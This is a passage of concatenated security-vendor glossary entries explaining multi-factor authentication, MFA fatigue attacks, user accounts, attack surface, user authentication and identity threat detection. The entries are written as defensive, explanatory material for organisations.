engineering tactics, and strong password practices. Multi-factor Authentication Multi-factor authentication (MFA) adds an extra layer of protection for user accounts and systems. When MFA is enabled, users must provide two or more verification methods to log in, such as a password and a security code sent to their mobile device. MFA adds an extra layer of security, making it difficult for attackers to gain access even if they have the password. It can also mitigate the damage of phishing attacks by requiring a second form of identification that the attacker is less likely to have. Repeated login attempts (in Brute Force Attacks) are also often thwarted by MFA, as the attacker would need more than just a password to gain access. AI-Powered Detection Artificial intelligence and machine learning can help detect anomalous login attempts and spot compromised accounts. AI systems analyze huge volumes of data to establish normal behavior patterns for users and systems. They can then flag unusual activity, like logins from unknown devices or locations, excessive failed login attempts, or changes to account information. AI and ML get "smarter" over time by incorporating new data into their models. Incident Response Planning In the event of an identity-based attack, an effective incident response plan is critical. The plan should outline steps for securing accounts and systems, investigating the source and scope of the attack, and remediating any damage. It should also include procedures for notifying affected customers or business partners if their data has been compromised. Post-incident reviews help identify areas of improvement for security controls and response strategies. Ongoing Monitoring Continuous monitoring of networks, systems, and user accounts is key to defending against identity theft and account takeover. Monitoring solutions use a combination of log analysis, network traffic inspection, and user behavior analytics to detect threats in real time. When malicious activity is uncovered, security teams receive alerts so they can quickly contain the attack and avoid data loss or system disruption. Regular reviews of access logs, permissions, and user profiles also help ensure that accounts and data are properly secured. With a robust set of security controls, vigilant monitoring, and adaptive technologies like AI, organizations can strengthen their defenses against the evolving techniques used in identity-based cyber attacks. But constant awareness and education across the workforce are equally important for thwarting social engineering attempts and other scams aimed at stealing login credentials or sensitive data. Conclusion As this article has shown, identity-based attacks are a serious threat in today's digital landscape. By compromising login credentials or spoofing trusted identities, cybercriminals can gain access to sensitive data and systems to launch further attacks. Identity-based attacks are constantly evolving, but with vigilance, education and adaptive defensive strategies, their impact can be minimized. Continued progress in biometrics, behavior analytics, and other authentication methods may also help curb these threats in the coming years. --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/mfa-fatigue/ A vulnerability where users become overwhelmed by constant multi-factor authentication prompts, potentially leading to inadvertent approval of fraudulent access attempts. Multi-factor authentication (MFA) fatigue refers to the frustration and annoyance users experience when constantly entering additional login credentials, such as one-time passwords sent via text message or an authentication app. MFA fatigue often leads users to disable MFA controls, creating security risks. As cyberattacks become more sophisticated, MFA has become crucial for account security. However, entering codes each time a user logs in or performs sensitive actions can be tedious and disruptive. This repetitious process causes MFA fatigue and leads users to perceive MFA as an obstacle rather than a safeguard. Some of the factors contributing to MFA fatigue include: Frequency of logins and MFA prompts: More logins and prompts lead to greater annoyance. Difficulty of MFA process: Complex passwords, multiple steps, and system errors intensify frustration. Lack of understanding: Users who don't grasp the security benefits of MFA may view it as a nuisance. Inconvenience: MFA that disrupts workflow or requires switching between devices leads to higher fatigue. To alleviate MFA fatigue, organizations should implement adaptive authentication, offer a choice of easy-to-use MFA methods, limit prompts when possible, and educate users about MFA's importance for account security. With the right approach, MFA can provide robust protection without significantly impacting user experience or productivity. What is Multi-Factor Authentication (MFA)? Multi-factor authentication (MFA) is a security system that requires more than one method of authentication from independent categories of credentials to verify a user's identity for a login or other transaction. MFA provides an extra layer of security for user accounts and data, reducing the risk of unauthorized access. MFA typically involves a combination of: Something you know, like a password or PIN Something you have, such as a security key or code generator app Something you are, such as a fingerprint or face ID By requiring multiple factors, MFA helps ensure that stolen or guessed passwords are not enough to access an account. If one factor is compromised, the attacker still needs the other(s) to authenticate. This multifactor approach drastically reduces the risk of account takeover and fraud. The most common MFA methods are: SMS text message codes: A temporary code sent to the user's phone which must be entered along with the password. Authenticator apps: An app like Google Authenticator or Duo generates time-based one-time passwords (TOTP). Security keys: A physical USB key or Bluetooth device must be tapped or inserted to authenticate. Biometrics: Technologies like fingerprint, face, or voice recognition provide "something you are" authentication. To combat MFA fatigue, organizations should choose strong yet user-friendly MFA methods, provide education on MFA's importance, and implement MFA gradually to allow users to adjust to the changes. With widespread adoption, MFA can significantly strengthen account security. Causes of MFA Fatigue in Organizations Multi-factor authentication (MFA) fatigue occurs when users become frustrated or tired of the extra steps required for MFA and look for ways around it. There are a few main causes of MFA fatigue in organizations: MFA can be perceived as inconvenient by some users, especially when frequently prompted for authentication. The extra login steps, like entering a code sent via text message or using an authentication app, can become tiresome over time and with frequent use. This can lead users to view MFA as an annoyance rather than a helpful security measure. A poor MFA user experience contributes to fatigue. If the MFA process is confusing, time-consuming, or prone to errors, users will grow increasingly frustrated with it. The MFA methods and tools selected by an organization play a significant role in the overall user experience. More seamless, user-friendly MFA options may help reduce fatigue. Lack of MFA understanding leads to pushback. When users do not fully understand why MFA is necessary and how it benefits security, they are more likely to view it as a hassle. Educating users about the value of MFA in protecting accounts and data can help gain buy-in and adoption, decreasing fatigue over the long run. To limit MFA fatigue, organizations should implement user-friendly MFA tools, provide education on MFA benefits, monitor for issues in the MFA process, and consider feedback from users on their experiences. Balancing strong security with an optimal user experience is key to the success of any MFA program. With the proper strategy and support in place, organizations can deploy MFA at scale without substantial fatigue. The Consequences of Unaddressed MFA Fatigue Unmitigated MFA fatigue can have serious ramifications for organizations. When employees experience high levels of frustration with MFA solutions, they may resort to unsafe workarounds that compromise security. For example, some users may disable MFA controls or share authentication credentials with coworkers to avoid perceived inconveniences, creating vulnerabilities that cybercriminals can exploit through other social engineering attacks. Prolonged MFA fatigue can also damage employee productivity and morale. The constant interruptions from authentication prompts reduce focus and workflow efficiency. Users who find MFA systems overly tedious or troublesome may come to view them as a hindrance, diminishing their effectiveness. This can foster resentment towards the IT department that implemented the solution. Furthermore, MFA fatigue poses risks to user experience and customer satisfaction. In workplaces where customers interact directly with MFA systems, a poor user experience can reflect poorly on the organization and damage relationships. Customers expect seamless, hassle-free interactions, and persistent authentication requests fail to meet these expectations. To mitigate these consequences, organizations must take proactive steps to alleviate and prevent MFA fatigue. Educating users about MFA and security best practices can help address frustration by clarifying the rationale behind the controls. IT teams should also evaluate MFA solutions for usability and look for ways to streamline the user experience, such as by reducing false positives. What is an MFA Fatigue Attack? An MFA Fatigue Attack refers to a type of cyber attack that exploits human weaknesses in multi-factor authentication (MFA) systems. MFA, designed to enhance security by requiring two or more verification factors, can become a vulnerability if users are overwhelmed or fatigued by repeated authentication requests. Here's a breakdown of how MFA Fatigue Attacks typically work: Repeated Authentication Requests: The attacker repeatedly triggers the MFA prompt to a user’s device, often through fraudulent login attempts. This can happen at all hours, including during the night or during work hours, leading to repeated notifications on the user’s phone or device. Exploiting User Fatigue and Frustration: The continuous flood of MFA prompts (such as push notifications) can lead to frustration or fatigue in the targeted user. The user might become desensitized to the alerts, seeing them as a nuisance rather than a security measure. User Complies to Stop Alerts: Eventually, hoping to stop the incessant notifications, the user may approve an authentication request. This is often done in a moment of frustration or in an attempt to diagnose the issue, without realizing it’s a malicious attack. Gaining Unauthorized Access: Once the user approves the MFA request, the attacker gains access to the account or system protected by MFA. This can lead to data breaches, account takeover, or further malicious activities within the network. Challenge in Detection and Response: MFA Fatigue Attacks can be challenging to detect because they exploit legitimate features of MFA systems. The attack relies on human error rather than technical vulnerabilities, making traditional security measures less effective. MFA Fatigue Attacks highlight the importance of not only having robust technical security measures but also educating users about security best practices. Organizations need to be aware of this type of attack and consider implementing strategies to mitigate its effectiveness, such as limiting the number of MFA prompts, providing clear guidance for users on how to respond to unexpected MFA requests, and using adaptive MFA solutions that adjust authentication requirements based on perceived risk. Best Practices for Mitigating MFA Fatigue To mitigate MFA fatigue, organizations should implement best practices that balance security and usability. MFA solutions should offer flexible options that suit different user needs and risk profiles. For example, SMS codes may suffice for low-risk accounts, while high-value accounts require stronger authentication like security keys. Implementing a tiered approach with multiple methods at different assurance levels gives users choices appropriate to the sensitivity of their accounts and data. User experience is critical. Solutions should have intuitive, streamlined interfaces that do not disrupt workflows. Options like single sign-on, risk-based authentication, and remember me features can minimize repeated logins for low-risk scenarios. Providing clear communication about MFA benefits and options helps gain user buy-in and adoption. Training and education are essential. Comprehensive programs should cover MFA concepts, available methods, how to use solutions securely, and the risks of account takeover and data breaches. Regular simulated phishing campaigns keep security top of mind for users. Analytics and monitoring help identify and remediate issues. Tracking metrics such as login success and failure rates, MFA method usage, and reported issues provides insight into how well the program is functioning. Monitoring for anomalies can detect potential account compromise early. MFA solutions must themselves be secure. Only trusted, certified options should be deployed. Solutions should support secure integration with identity providers and be hardened against vulnerabilities. Keys and credentials must be protected. Following these best practices helps achieve the optimal balance of strong security and good usability in an MFA program. With the right combination of technology, policy, and people, organizations can mitigate MFA fatigue and gain widespread adoption of this critical security control. Evaluating Alternative Authentication Methods To reduce reliance on passwords alone, organizations are implementing alternative authentication methods. Some options to consider include: Biometric authentication, like fingerprint, face, or voice recognition, uses unique physical attributes to verify a user’s identity. Biometrics are very difficult to replicate but require additional hardware like scanners. Biometrics also raise privacy concerns for some. Security keys, like YubiKeys, provide two-factor authentication via a physical USB device. Security keys are very secure but require purchasing and distributing keys to all users. Keys can also be lost or stolen. Behavioral biometrics track how a user typically interacts with systems and devices to recognize anomalies that could indicate fraud. Behavioral biometrics are passive and frictionless but still an emerging technology. Adaptive authentication balances security and usability. It can reduce interruptions for legitimate users while detecting anomalies indicating compromised accounts. It considers the location, devices, login patterns and other fraud indicators, and when risk thresholds are crossed, it may then require multi factor authentication. Single sign-on (SSO) allows users to access multiple applications with one set of login credentials. SSO reduces the number of passwords for individuals to remember and manage. However, if compromised, SSO could provide access to many systems. SSO may also not work for all internal and third-party applications. Choosing the right additional authentication methods depends on an organization’s security needs, applications, resources, and user experience requirements. A layered security approach with MFA and SSO at a minimum is recommended to reduce dependence on static passwords. Continually evaluating new options as technology evolves is also advised to stay ahead of threats. Conclusion As cyberthreats continue to evolve, multi-factor authentication remains an important tool for organizations to leverage. However, implementers must remain vigilant about the risks of MFA fatigue to ensure maximum effectiveness and user adoption. By choosing MFA methods that balance security and convenience, educating users about threats, and providing alternatives for accessibility, organizations can reap the benefits of this critical safeguard while avoiding fatigue. --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/user-account/ A digital identity representing a specific person—used to authenticate and control access to systems, applications, and data. A user account is an object that's created for an entity to enable it to access resources. Such an entity can represent a human being, software service, or a computer. User accounts allow these entities to log in, set preferences, and access resources based on their account permissions. The security of any system relies heavily on how well user accounts are managed. User accounts provide individuals access to networks, devices, software, and data. For cybersecurity professionals, understanding what constitutes a user account and how they should be properly managed is crucial. With billions of accounts globally accessing sensitive data and systems, user accounts have become a prime target for cyber attacks. Protecting them is key to protecting digital infrastructure and assets. By following recommended guidelines for user account creation, management, monitoring, and control, organizations can strengthen their security posture and reduce account-based risks. Types of User Accounts There are several types of user accounts in computing systems and networks: System accounts Administrator accounts Standard user accounts Guest accounts Local accounts Remote accounts System accounts are created by the operating system and are used to run system services and processes. These accounts have elevated access privileges to access system resources but are not used for interactive login. Administrator accounts have full access permissions to make changes to the system. They are used to install software, configure settings, add or remove user accounts, and perform other administrative tasks. Administrator accounts should be limited to authorized personnel only. Standard user accounts have basic access permissions to normal system resources and are used by general system users to login and perform routine tasks. They have limited permissions to make system changes. Guest accounts provide temporary access with limited permissions. They are often disabled by default for security. Local accounts are stored on the local system and provide access only to that system. Network accounts are stored on a network domain controller and provide access to resources on the network. Remote accounts allow users to login to a system from a remote location over a network. Extra security measures should be implemented for remote access to safeguard systems and data. Proper configuration and management of accounts are crucial for system and network security. Restricting administrative access and privileges can help reduce the risk of exploitation by bad actors. Service Accounts vs User Accounts Service accounts and user accounts are two types of accounts in an IT system with distinct purposes and access levels. A user account is an account assigned to an individual user to access a system. It typically requires a username and password for authentication and is used by a single person. User accounts should have limited permissions based only on a user's role and job responsibilities. On the other hand, a service account is an account assigned to an application, software or service to interact with the system. Service accounts have a broad range of permissions needed to operate the service. They do not belong to any single user. Some examples of services that may use service accounts include: Database services to access data Backup services to read and write files Monitoring services to check system health Due to their high privileges, service accounts are common targets for cyber attacks and must be properly secured. Best practices for managing service accounts include: Assigning strong, complex passwords that are regularly rotated Monitoring for any unauthorized access Disabling any interactive login Applying the principle of least privilege by only granting necessary permissions Separating service accounts for different applications Properly administering accounts by role, enforcing strong security policies, and limiting unnecessary access are critical for reducing risk and protecting systems. Failing to make a clear distinction between user and service accounts or not properly securing them can pose serious threats. How User Accounts Work: Authentication and Authorization User accounts allow individuals to access computer systems and services. They work through the processes of user authentication and authorization. Authentication verifies a user's identity. It typically involves a username and password, but can also use multi-factor methods like security keys, one-time passwords, and biometrics (fingerprints, facial recognition). The authentication method confirms that the user is who they claim to be before allowing them into the system. Once authenticated, authorization determines what level of access the user has. It assigns permissions and privileges to access data, run programs, and perform specific actions based on the user's role. For example, an administrator account usually has full access, while a standard account has limited access. Authorization helps control what authenticated users can and cannot do within a system. User accounts are created, managed, and deleted by system administrators. Admins determine what credentials and permissions are required for each role. They monitor accounts for signs of compromise like failed login attempts, and deactivate or remove accounts when users no longer need access. Securing user accounts is crucial for any organization. Following best practices like strong, unique passwords, limiting privileges, and monitoring for suspicious activity helps prevent unauthorized access and protects sensitive systems and data. Implementing multi-factor authentication and single sign-on where possible adds an extra layer of protection for user accounts. With the increasing sophistication of cyber threats, robust user account security has never been more important. Well-designed authentication, authorization, and account management policies and controls are essential for ensuring that only verified individuals gain access to systems and information. Continuous monitoring and adapting to evolving risks help keep user accounts - and the assets they protect - secure. Why User Accounts Matter for Cyber Security User accounts are a key part of security, privacy and usability. They: Control access to resources by assigning permissions to accounts based on roles and responsibilities. This prevents unauthorized access. Enable authentication through passwords, biometrics or security keys. This verifies a user's identity before granting them access. Allow for personalization and customization of settings, applications, and workflows for each individual. Provide accountability by linking access and changes to a specific account. This allows monitoring user activity and an audit trail. Increase productivity by remembering preferences and past interactions. This provides a seamless experience for users. User accounts are fundamental components of any computer system, application or service. They make technology accessible, secure, and personalized for all users. Best Practices for Managing User Accounts To effectively manage user accounts, organizations should implement best practices around account creation, authentication, authorization, and auditing. When creating accounts, administrators should collect only the minimum information needed and be transparent in how data will be used. Requiring strong, unique passwords and two-factor authentication helps prevent unauthorized access. Strict authorization controls should limit users’ access to only the systems and data they need to perform their jobs. The principle of least privilege - granting the fewest privileges needed - reduces risk. Access should be reviewed periodically and revoked immediately upon termination. Routine auditing and monitoring of accounts is essential. Analytics tools can detect anomalous behavior indicating compromised accounts or insider threats. Audit logs should be reviewed regularly and retained according to legal and regulatory requirements. Attention to stale user accounts should also be prioritized. User education and training are also critical. Employees should understand policies around password hygiene, phishing identification, and data handling. Regular reminders and simulated phishing campaigns help reinforce good practices. Diligently implementing these best practices helps organizations reduce risk, comply with regulations, and build trust. Conclusion User accounts are crucial components of an organization's cybersecurity infrastructure. They provide access control and accountability by linking individuals to their online identities and the permissions granted to those accounts. Carefully managing user accounts - including proper provisioning, monitoring, and deprovisioning - is essential for maintaining a secure digital environment. User accounts are the gateway through which employees access sensitive data and critical systems, so protecting them must be a top priority for any cybersecurity professional. --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/attack-surface/ The comprehensive set of digital and physical vulnerabilities and entry points through which an attacker might gain unauthorized access to a system or network. The attack surface refers to all the vulnerabilities and entry points that could be exploited by unauthorized users within a given environment. It encompasses both digital and physical components that attackers target to gain unauthorized access. The digital attack surface includes network interfaces, software, hardware, data, and users. Network interfaces like Wi-Fi and Bluetooth are common targets. Vulnerable software and firmware provide opportunities for injection or buffer overflow attacks. Compromised user credentials and accounts are frequently used to gain access to the system, social engineering attacks. The physical attack surface refers to the tangible components that can be tampered with to infiltrate a system. This includes unattended workstations, improperly secured server racks, vulnerable wiring, and insecure building access. Attackers may install keylogging devices, steal data storage devices, or gain access to networks by bypassing physical security controls. What vulnerabilities constitute an attack surface? A system's attack surface consists of any weaknesses or flaws that can be exploited to gain unauthorized access to data. Potential vulnerabilities include: Software and hardware components Network infrastructure User access and credentials System configurations Physical security Attack Vector vs Attack Surface Attack vectors describe the path or means by which an attacker can gain access to a system, such as through malware, phishing emails, USB drives, or software vulnerabilities. Attack surface is the number of possible attack vectors that can be used to attack a system. Reducing the attack surface requires identifying and eliminating as many vulnerabilities as possible across all potential attack vectors. This can be achieved through measures like patching software, restricting user permissions, disabling unused ports or services, implementing multi-factor authentication (MFA), and deploying updated antivirus or anti-malware solutions. An optimized attack surface not only strengthens security posture but also allows cybersecurity teams to focus resources on monitoring and protecting critical assets. When the number of vulnerabilities is minimized, there are fewer opportunities for attackers to compromise a system, and security professionals can better allocate time and tools to defend high-value targets and respond to threats. Mapping the Attack Surface: Assets, Entry Points, and Vulnerabilities Mapping the attack surface involves identifying the organization's digital assets, potential entry points, and existing vulnerabilities. Digital assets encompass anything connected to the network that stores or processes data, including: Servers Endpoint devices (e. g. desktops, laptops, mobile devices) Networking equipment (e. g. routers, switches, firewalls) Internet of Things (IoT) devices (e. g. security cameras, HVAC systems) Entry points refer to any path that could be exploited to gain access to the network, such as: Public-facing web applications Remote access software Wireless networks USB ports Vulnerabilities are weaknesses in an asset or entry point that could be leveraged in an attack, for instance: Unpatched software Default or weak passwords Improper access controls Lack of encryption By gaining visibility into all digital assets, entry points, and vulnerabilities across the organization, security teams can work to reduce the overall attack surface and strengthen cyber defenses. This may involve activities such as disabling unnecessary entry points, implementing stronger access controls, deploying software updates, and educating users on security best practices. Continuously monitoring the attack surface is key to maintaining robust cybersecurity. As new technologies are adopted and networks become more complex, the attack surface will inevitably evolve, creating new security risks that must be identified and mitigated. Attack Surface Reduction: Eliminating Entry Points and Hardening Assets Reducing an organization’s attack surface involves eliminating potential entry points and hardening critical assets. This includes removing unused internet-facing services and unused open ports, decommissioning legacy systems, and patching known vulnerabilities across the infrastructure. Strict access control and least-privilege policies should be implemented to limit adversary access to sensitive data and systems. MFA and single sign-on (SSO) solutions provide additional account protection. Regularly auditing user and group access rights to ensure they are still appropriate and revoking unused credentials minimizes the attack surface. Firewalls, routers and servers should be hardened through disabling unused functionality, removing default accounts, and enabling logging and monitoring. Keeping software up to date with the latest patches prevents known vulnerabilities from being exploited. Network segmentation and micro-segmentation compartmentalize the infrastructure into smaller, isolated sections. This way, if an adversary gains access to one segment, lateral movement to other areas is restricted. Zero-trust models should be applied, where no part of the network is implicitly trusted. Conducting regular risk assessments, vulnerability scans, and penetration tests identifies weaknesses in the infrastructure before they can be exploited. Closing security gaps and remediating high and critical risk findings reduce the overall attack surface. Maintaining a minimal attack surface requires continuous effort and resources to identify new risks, reassess existing controls, and make improvements. However, the investment in a robust security posture yields substantial benefits, allowing organizations to operate with confidence in today's threat landscape. Overall, concentrating on eliminating entry points, hardening critical assets, and adopting a zero-trust approach is key to successfully reducing the attack surface. Identity as an Attack Surface Identity is an increasingly important attack surface for organizations to manage. As companies adopt cloud services and employees access critical systems remotely, identity and access management becomes crucial to security. Weak, stolen, or compromised credentials pose a significant gap. Login details of users are often targeted by attackers since gaining control of authorized accounts can grant the attacker access to an organization's resources. Phishing emails and malware aim to trick users into providing usernames and passwords. Once user credentials have been obtained, attackers can use them to login and access sensitive data, deploy ransomware, or maintain persistence within the network. MFA adds an extra layer of identity protection. Requiring not just a password but also a code sent to a mobile device or hardware token helps prevent unauthorized access, even if the password is stolen. Adaptive authentication takes this a step further by analyzing user behavior and locations to detect anomalies that could signal account compromise. Privileged Access Management (PAM) limits what authenticated users can do within systems and applications. Only providing administrators the minimum level of access needed to do their jobs reduces the potential impact of a compromised account. Strictly controlling and monitoring privileged accounts, which have the highest level of access, is especially important. Managing external access for third parties like contractors or business partners introduces more risks. Ensuring partners follow strong security practices and limiting their access to only what is necessary is key. Terminating all access when relationships end is equally important. Effective identity and access management involves balancing security and usability. Overly complex controls can frustrate employees and reduce productivity, but weak access policies leave organizations vulnerable. With the right strategy and solutions in place, companies can reduce identity-based risks while enabling business operations. Continuous Attack Surface Management: A Security Best Practice Continuous attack surface management is a recommended best practice in cybersecurity. It refers to the ongoing process of discovering, cataloging, and mitigating vulnerabilities across an organization's entire attack surface - which includes all digital assets, connections and access points that could be targeted. Discovery The first step is discovering and mapping all components of the attack surface, including: Networks, servers, endpoints, mobile devices, IoT devices, web applications, software, etc. All external connections and access points to these assets like WiFi networks, VPNs, third-party integrations, etc. Any vulnerabilities, misconfigurations or weaknesses associated with these components that could be exploited, such as social engineering. Monitoring Once the attack surface has been mapped, continuous monitoring is required. As new digital assets, connections and technologies are added, the attack surface changes and expands, creating new vulnerabilities. Continuous monitoring tracks these changes to identify new vulnerabilities and keep the attack surface map up to date. Remediation With visibility into the attack surface and vulnerabilities, security teams can then prioritize and remediate risks. This includes patching software, updating configurations, implementing additional security controls, decommissioning unneeded assets, and restricting access. Remediation efforts must also be continuous to address new vulnerabilities as they emerge. Continuous attack surface management is an iterative process that allows organizations to shrink their attack surface over time through discovery, monitoring, and remediation. By maintaining a complete and updated understanding of the attack surface, security teams can better defend digital assets and prevent successful breaches. --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/user-authentication/ The process of verifying an individual's claimed identity (e.g., via passwords, tokens, or biometrics) before granting access to systems or resources. User authentication is the process of verifying that users are who they claim to be. It is a crucial part of cybersecurity, enabling organizations to control access to systems and data. There are three main types of authentication factors: Something you know - like a password, PIN, or security question. This is the most common method but also the weakest since this information can be stolen or guessed. Something you have - such as a security token, smart card, or authentication app. These physical devices provide an extra layer of security but can still be lost or stolen. Something you are - biometrics like fingerprints, facial recognition, or iris scans. Biometrics are very secure since they are unique to each individual but do require extra hardware like scanners. Multi-factor authentication (MFA) combines multiple factors, like a password and security token, for stronger protection. It helps prevent unauthorized access even if one factor is compromised. Federated identity management (FIM) uses a single set of login credentials across multiple systems and applications. It provides a seamless user experience while still enabling strong authentication. Robust user authentication with MFA and FIM is essential for securing access in today's organizations. It protects sensitive data and resources from potential threats like account takeover attacks, unauthorized access, and identity theft. With the rise of remote work and cloud services, user authentication has become more critical than ever. How Does User Authentication Work? The user authentication process typically involves three steps: Registration or enrollment: The user provides details to set up their identity, such as a username and password. Biometric data like fingerprints or facial scans may also be collected. Presenting credentials: The user enters their login credentials, such as a username and password, or provides a biometric scan to access a system or service. Verification: The system compares the credentials entered to the registered details to verify the user's identity. If the details match, the user is granted access. If not, access is denied. Modern authentication methods have additional safeguards to strengthen security. Multi-factor authentication requires not just a password but also a code sent to the user's mobile phone or an authentication app. Biometric authentication uses fingerprint, face, or iris scans, which are very difficult to replicate. Contextual authentication considers a user's location, device, and behavior to detect anomalies that could indicate fraud. Behavioral biometrics track how a user typically types, taps, and swipes to build a personal profile for continuous authentication. Robust user authentication is essential to protect sensitive data and systems from unauthorized access, especially as cyber threats become more sophisticated. Organizations must implement strong, multi-layered authentication and stay up-to-date with the latest identification technologies to minimize risks in today's digital world. The Importance of Strong User Authentication User authentication is one of the most important aspects of cybersecurity. Strong user authentication helps prevent unauthorized access to systems, applications, and data. There are several methods of user authentication, including: Knowledge factors like passwords: Passwords are commonly used but can be guessed or cracked. Long, complex, unique passwords or passphrases are more secure. Ownership factors like security keys: Physical security keys that connect to devices provide strong two-factor authentication. They are difficult for attackers to replicate (this is also called Token-Based Authentication). Certification factors like digital certificates. Certificate-based authentication relies on digital certificates, electronic documents akin to passports or driver's licenses, to authenticate users. These certificates hold the user's digital identity and are signed by a certification authority or contain a public key. Biometric factors like fingerprints or facial recognition: Biometrics provide convenient authentication but biometric data can be stolen. They should not be used alone. Behavioral factors like typing cadence: Analyzing how a user types or interacts with a device can provide passive authentication but may be spoofed by sophisticated attackers. User authentication protects organizations by reducing account takeover attacks, preventing unauthorized access, and limiting access to sensitive data and systems only to legitimate users. Strong MFA should be enabled wherever possible, especially for administrators, to help reduce the risk of data breaches and cyber threats. Frequent review and updating of authentication policies and methods is also important to account for evolving risks and technologies. User authentication is a vital safeguard for any organization that stores or transmits sensitive data. Implementing robust controls with strong MFA helps ensure that only authorized individuals can access accounts and systems. Strong user authentication, combined with good cyber hygiene like complex unique passwords, is key to improving cybersecurity. Authentication Factors There are three types of user authentication factors used to verify a user's identity: Something you know, like a password or PIN. Passwords are the most common authentication method. Users provide a secret word or phrase to gain access to an account or system. However, passwords can be stolen, guessed, or hacked, so they alone do not provide strong authentication. Something you have, such as a security token or smart card. These physical devices generate one-time passwords or codes to authenticate users. Since the devices are needed along with a password or PIN, this provides two-factor authentication and stronger security than passwords alone. However, the devices can be lost, stolen, or duplicated. Something you are, such as fingerprints, voice, or retina scans. Biometric authentication uses unique biological characteristics to identify individuals. Fingerprint scans, facial recognition, and retina scans are popular biometric methods. They are very difficult to spoof and provide strong authentication. However, biometric data can still be stolen in some cases and once compromised, you cannot change your fingerprints or retinas. To achieve the strongest authentication, organizations use multi-factor authentication (MFA) which combines two or more independent authentication factors. For example, accessing a system may require both a password (something you know) and a security token (something you have). This helps ensure that only authorized users can access accounts and prevents unauthorized access. MFA and biometric authentication methods provide the strongest protections for user accounts and systems. As cyber threats become more advanced, single-factor password authentication is no longer sufficient. Robust MFA and biometric solutions help organizations reduce risks, enable compliance, and build user trust. Single-Factor Authentication Single-factor authentication is the simplest method of user authentication. It relies on just one piece of evidence, such as a password, to verify a user's identity. While simple to implement, single-factor authentication is not very secure since the factor (e. g. password) can potentially be stolen, hacked or guessed. Passwords are the most common single factor. Users provide a secret word or phrase to gain access to an account or system. However, passwords have many vulnerabilities and are prone to being cracked, stolen or guessed. Password complexity requirements aim to make passwords harder to compromise but inconvenience users and lead to poor security practices like reusing the same password across accounts. Security questions are another single factor, where users provide personal information like their mother's maiden name or city of birth. Unfortunately, this information may be obtainable by malicious actors via social engineering or data breaches. Static information also provides a false sense of security since the data does not actually authenticate the user. SMS text message authentication, also known as one-time passwords or OTPs, involve sending a numeric code to a user's phone which they must then enter to log in. While more secure than static passwords, SMS-based authentication is still vulnerable to SIM swapping where an attacker transfers the victim's phone number to a new SIM card they control. Phone numbers can also be spoofed using VoIP services. Single-factor authentication methods are better than no authentication but do not provide robust protection for user accounts and sensitive data. Stronger authentication schemes like two-factor authentication and multi-factor authentication should be used whenever possible to verify users and reduce account compromise. Two-Factor Authentication (2FA) Two-factor authentication (2FA) is an extra layer of security for online accounts. It requires not only your password but also another piece of information like a security code sent to your phone. With 2FA enabled, after you enter your password, you'll be asked to provide another authentication factor like: A security code sent via text message or mobile app A code generated by an authentication app like Google Authenticator or Authy A physical security key The two factors usually are: Something you know (like your password) Something you have (like your phone or a security key) Requiring multiple factors makes it much harder for attackers to access your accounts. Even if they steal your password, they would still need your phone or security key to log in. 2FA is available for many online services like email, social media, cloud storage, and more. Though not perfect, enabling 2FA wherever it's offered adds an important safeguard for your accounts. Using a password manager to generate and remember complex unique passwords for all your accounts, combined with 2FA, are two of the best ways individuals can improve their cybersecurity. While some users find 2FA inconvenient, the added security is worth the small hassle for most. And options like authentication apps and security keys minimize the interruption to your workflow. With threats like phishing and data breaches on the rise, 2FA has become an essential tool for protecting online identities and accounts. Enabling multi-factor authentication, especially on important accounts like email, banking, and social media, is one of the most impactful steps everyone should take to strengthen their cybersecurity defenses. Together with strong, unique passwords, 2FA makes you an unattractive target and helps ensure your accounts stay out of the hands of malicious actors. Multi-Factor Authentication (MFA) Multi-factor authentication (MFA) is an authentication method in which a user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. MFA adds an extra layer of security for user sign-ins and transactions. Some common examples of MFA combine two or more of: SMS or voice call to a mobile phone - After entering your username and password, you get a code via SMS or phone call to enter. Authentication app like Google Authenticator or Duo - An app on your phone generates a rotating code to enter after your password. Security key or token - A physical USB drive or Bluetooth device provides an additional code or authentication method. Biometrics - Technologies like fingerprint, face, or iris scanning are used along with a password. Benefits of MFA MFA provides an extra layer of protection for user accounts and helps prevent unauthorized access. Even if a hacker gets hold of your password, they would still need the second authentication factor like your phone or security key to log in. MFA can help reduce the risk of phishing attacks, account takeovers, and more. For organizations, MFA also helps meet compliance requirements for data security and privacy. MFA should be enabled whenever possible for all user accounts to help improve security and reduce the risks of compromised credentials. While MFA does add an extra step to the login process, the additional security and protection for accounts make it worth the effort. How MFA Works Multi - factor authentication (MFA) adds an extra layer of security for user logins and transactions. It requires not only a password and username but also another piece of information like a security code sent to the user's mobile device. MFA helps prevent unauthorized access to accounts and systems by requiring two or more methods (also referred to as factors) to verify a user's identity. The three main types of authentication factors are: Something you know (like a password or PIN) Something you have (such as a security token or mobile phone) Something you are (such as a fingerprint or face scan) MFA uses a minimum of two of these factors, so if one factor is compromised or stolen, unauthorized access is still prevented. When a user attempts to log in to a system or account, the first factor (typically a password) is entered. Then a second authentication factor is requested like a code sent to the user's mobile phone via text message or an app like Google Authenticator. The user... --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-threat-detection-and-response/ A security approach that monitors and analyzes identity‑related activities to detect credential theft, privileged misuse, or lateral movement, triggering automated and manual responses to contain threats. Identity Threat Detection and Response (ITDR) refers to the processes and technologies focused on identifying and mitigating identity-related risks, including credential theft, privilege escalation and, most important, lateral movement. ITDR encompasses monitoring for signs of identity compromise, investigating suspicious activity, and taking automated and manual mitigation actions to contain threats. ITDR employs various methods to analyze authentication traffic to detect potential identity-based threats. Prominent methods are the use of machine learning to detect access anomalies, monitoring for suspicious authentication sequences, and analyzing authentication packets to disclose TTPs such as Pass-the Hash, Kerberoasting and others. It is paramount that the ITDR will use all these methods conjointly to increase accuracy and avoid the false positives that arise from flagging a user accessing a new machine as an anomaly that renders alerting. ITDR solutions take action through automated responses like multi-factor authentication to verify that a detected anomaly is indeed malicious and blocking access of accounts that are determined as compromised. . They also generate alerts for security analysts to investigate and remediate. Analysts may reset account passwords, unlock accounts, review privileged account access, and check for signs of data exfiltration. Effective ITDR requires aggregation of identity signals across an organization's identity infrastructure. This includes on-prem and cloud directories, as well as any component within the environment that manages user authentications (such as Active Directory). Ideally, these 